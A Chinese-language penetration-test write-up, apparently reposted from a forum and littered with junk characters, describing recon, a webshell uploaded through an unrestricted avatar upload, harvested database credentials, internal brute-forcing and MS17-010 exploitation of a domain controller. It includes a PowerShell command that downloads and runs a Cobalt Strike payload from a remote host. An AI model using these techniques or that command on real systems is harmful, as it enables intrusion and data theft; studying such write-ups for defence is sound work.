9 T D! v9 h, o 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
$ v, d! N9 r9 Z" O . Z" B0 k9 t1 \, o+ l; ]
: Z* H" @. ^8 ^" z1 |9 `" f* E8 F* d + G1 c* z1 e, W
2 l+ h) }5 x3 }$ Q2 ^" Z
: Q9 I7 m3 J# D 正文
, G( ^/ D4 O: `9 o7 J* q1 j/ R+ X * O+ Y E. t) Q {2 c* w$ ~9 E4 r7 ~7 h
) w) Q) T9 Z2 x
& t( S: }) s( \' S6 @
* _& A+ q2 ^* k% A- q- j
0 r2 I% l/ y& t 目标:www.xxxx.com(一家教育机构) 4 v3 y, c$ Z0 S3 q1 u1 x9 U
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
* H4 ]5 E4 l6 b/ Y5 m 3 [6 ]$ n! O, @, c% B+ Q
) N2 D0 G8 S5 E* P( Z
0 P) ~( H& }! N: n* w ( [5 _8 w, k/ b# n! {" V6 a
- P; Z0 z+ e/ Q9 y
进行了简单的信息搜集
1 k, I+ s$ h2 q4 p 9 j, ]% L, Q p9 K0 B; g
4 C, h# i2 c$ S. u
2 L8 j7 a0 [; k6 l! G* H9 I9 n
4 C7 M, _$ |0 p 子域名搜集
0 J) |1 R( o6 I- f4 ?; W 7 m6 w4 e# o; \! F$ E V' s
3 T9 l. J) b V7 q! M9 M- Y* L- _5 T
% p8 y- R& D/ E
0 g( s( d( S. g4 ]% J
( i. ? ^+ e, R! T5 C1 e+ ^/ B fofa找资产
% I; x/ q4 v& ~4 A
! m5 |" p- F# y- q/ C$ d; Y0 v! V7 V& m* c+ O" h' `" V1 ~
. @* L- v4 p% n3 D3 C" ^
7 R$ Z, a3 O. G% Q
. E: S- E- O& N1 D( q; |3 i
2 n: o v1 {7 p4 V) Y6 M' N/ s
v5 w9 v/ F: a! L5 A 一共七个资产。去重之后只有两个。 ! B3 ^0 J* j4 F6 w% S. {% Z" V: O
! ^1 Y+ o& {2 p4 \0 I
2 ]6 t. } N: F9 }( R % M" J0 d% x# v2 W+ ~+ a( C3 c6 _( w
1 P8 r7 ?( b+ J; y$ k8 ~; Y3 X
目录探测" r6 W( J& b1 B: A% T% n
! |8 D: ^* n5 @- i9 z ]
" C! f5 X7 _" B# l
8 N1 U$ \1 Q! y' p # O0 n8 J, c5 v7 a! y
0 I* E0 s9 p/ }' ?! Y% s 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! D( P# c# ~: E( v1 J * I, @# ^0 Q2 O
( h% ]+ D4 e' Z% F6 p0 `' b. c( l
3 @4 S& N; ^; v$ b! d$ t6 q, M( w% D1 `
我又尝试了通过修改返回包来绕过登录界面9 `! Z6 H' x; }% e6 ^" U/ u
K- o2 S+ I8 d! c" \ @2 Z/ n$ v% ?8 T' a# y
4 I- d& E; h; R i% x/ U
( M+ ?: c6 m/ h3 _; C8 q' z. \1 N
; N+ S$ A0 H$ u. L9 ] 还是不行,尝试注入无果/ D' T* ]5 [" i1 g
( I# ~; ?# o8 w1 F" d9 C' _' e$ J ~/ b
2 c. {" A1 m) {; P9 ^8 |6 p. b
0 X) U* E( V9 F; f
6 k/ Q6 N K. o- L 不过我目录探测出了一处Spring信息泄露
7 g. e/ x9 U3 q9 ?: Y1 f$ B
' t7 d% [# I" G, `& e6 I
i& `. W' K, n* j) I# D* S- c3 v/ a; Z
8 [; h9 h X& `) n v( h0 L( _% P
' r4 I9 l( d( B* A0 W+ {
. L5 j+ A1 \' _4 v8 g9 A) ?+ f. k & F7 X8 S3 Q) ?* a
4 d" b6 [7 B: f* [( a
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
$ O5 j4 g( Z% O : N4 w6 t C2 X8 e( Z
* u2 v* f+ I; S* }6 n$ f2 X
/ ^9 \2 x. R, m4 D2 y2 ]+ S & B8 {! e* J5 ?# m9 i
5 I! L" f4 Z! M( c: i4 S
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
* s' V y, `* z p: }) j 2 D# ], |& L2 T4 E
/ j9 |1 A" _0 Q: @9 L
. Q5 @! G1 z" H5 O' q : v. E7 Q1 `0 C! L
; \0 \4 A7 p' c: n
获取有些师傅到这一步就手机抓包电脑测了。* K" f3 u0 n ]' O$ e- y% C
- s D3 W. l6 p6 [8 N" C$ ^( Y
6 l* E3 w9 A- E4 K1 C% n5 t Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。0 [& o. Y2 D& o
8 t- C) U6 \ a4 L
M! r: E. L9 U! X2 ?* z2 Q 其中在一个公众号发现了小程序,可以进行注册。- N5 a0 {: s2 u9 `7 }. f0 K
~9 l @) ^* T3 r3 A6 |% |7 a- {+ @
% E5 C4 s2 e- h+ u8 P
看到了头像上传,尝试上传获取WebShell) \, ~/ I% j t# X: c q
; Y* ~: Y4 {9 p1 {* F: D) A
# [" U5 w j0 x, M H4 G
9 J/ L+ G& _8 ]6 _" ]6 v
: [5 Q6 l' }, e7 i; V
% R0 i; E* G" [2 ~ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
; C6 r# J# [/ @2 a6 u % i! D, g. H) g# q9 L
( F: l8 {6 m% {+ _" D - E, R, D( Q2 t3 |2 x' l1 p# S4 [
6 B/ Z" p" ]- C, b
& g* D/ m/ e1 t8 Q" N9 A1 D 然后上了大马- a, f7 @3 k) X8 Z A
8 I g6 N E5 H7 h' g% m
6 e8 P6 B5 O" u' K% s' P; c
3 i' }8 C( w% a1 }9 t E$ l- s
& Y2 x- z, [/ t+ y/ J
! Q X! [7 T, J' t7 r+ W
- I' ]" L/ X6 x& N
7 Z2 Q& Q! L+ i! d% T
0 G. W: C8 r6 @+ ]4 j$ f 通过翻找文件发现数据库账号密码
; y' H, p* B% E+ i$ b5 t) b3 @
+ n: i8 a0 h( }5 V$ d8 P L& m( I: q9 l
6 _& {* c; ^4 H( P
; M' C! n) s/ v( A
/ b4 H& p4 l7 |& S6 m --内网渗透" b& }5 _% S1 ]' P7 w: A" N+ Q" |
6 a2 d$ a# F( Q
2 U) M. C8 T0 Y- W8 y2 o
直接通过powershell执行 cs上线
( | q! c7 g+ m; ]! E : t# ` M! ^0 V" d# R I- f0 p3 x+ K" b
+ Y! K6 G- F" c- c- B$ O, l powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
/ e1 ?- z; M f& K9 f6 ? # |) _" ]" a0 N9 U9 s
* o" Q2 M4 L, y5 V5 n1 f+ P3 w
' `: d6 U! z; } W
* K. s0 E- @8 T! q+ D/ r3 ?) Q- i4 ?9 q% m
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
; f+ Q \! b Y [ 0 g2 N6 i* Z: ], o9 R
8 ]: q3 G- L- j. q6 i0 ~ 0 b x* j% q; s3 E9 n7 j# d
' R% M! b* r- W, J3 Q. k# L! H1 m
O8 v2 E8 c, B$ e; Z- p( E* t8 G 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 4 `# J" T& y2 H% d; ?
d3 P3 B# y: z- c* f) ]" @
$ a# u: k1 C" ?
# J( f9 p' ~$ J
: |; e9 X# I8 I1 `, j* p; i# c+ u/ H
/ Q- o2 _1 M( `0 U1 I
; ]- w# a. _3 F: p
9 O7 M7 z% Q6 x3 J. Y6 }3 W
% z) W/ P: C% d# g; \& S 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* Q; d) s( @# _ z
5 J( e! e3 ]6 _+ V8 @4 j
2 w& s8 L) o" h
; p9 x" c: Q: q( H) R' @# ]8 e' q& t
% ^; n* u7 p# Q, i; b3 W
* C! @- U* k% J) Q/ V
7 d- r! [7 s. P8 s& b
; j. ^2 o$ D9 G. U + ^# m* M# j1 u! u' A; V, y+ j
; s; k+ r, i v0 C1 {1 n* ?
. e3 i: o* z T, T9 U2 v% ?
, ? V5 Z* Q( n( W2 _0 a+ d& N' g
% T& l: ]3 Z1 @$ H- g5 u
$ L6 X! I' l# Y5 m& Y: a, k
# ?7 O# u9 D8 h& x
7 `, y" I3 j2 ~. X; X) r. F! O 小结) K: V8 E* H. J& _
1 ^/ a# }! w. p6 ~ K& O5 x, A
+ x/ `% t9 L6 b9 @) c4 G
' M# B4 K* G3 h . O* C- G# N2 A
8 A0 C% `/ Y: \# L2 K. [3 F 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
5 [/ C/ W8 j# x) M; ~' K : R# g& l8 G) {# r
5 o, q* k" W( ]0 v8 U, y
5 C' p/ X# X- {% o* c- @ f 6 y0 {$ a1 z q' B
, m; g; I$ c& _, J6 Z; P0 K - / d+ [: P) {8 n
# r' |* Y" g" `
! a# [! \: D% f% m' `& g -
3 ^# E0 q; F/ W0 b' @) }/ g4 a. s% y
) v7 \. s2 H, q/ O% d( v
) |1 Z$ O; C x2 E
( a. \* B* j4 t* o: S) w& W' t# |, ?6 U( v" |/ W
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html+ o X: R4 p8 A, P* v
* k' q0 T0 a( z+ h
+ Y8 D. _: Q7 b4 I* ?9 G. H" h" q
- l2 V; ^ c$ m+ O$ T6 U% K |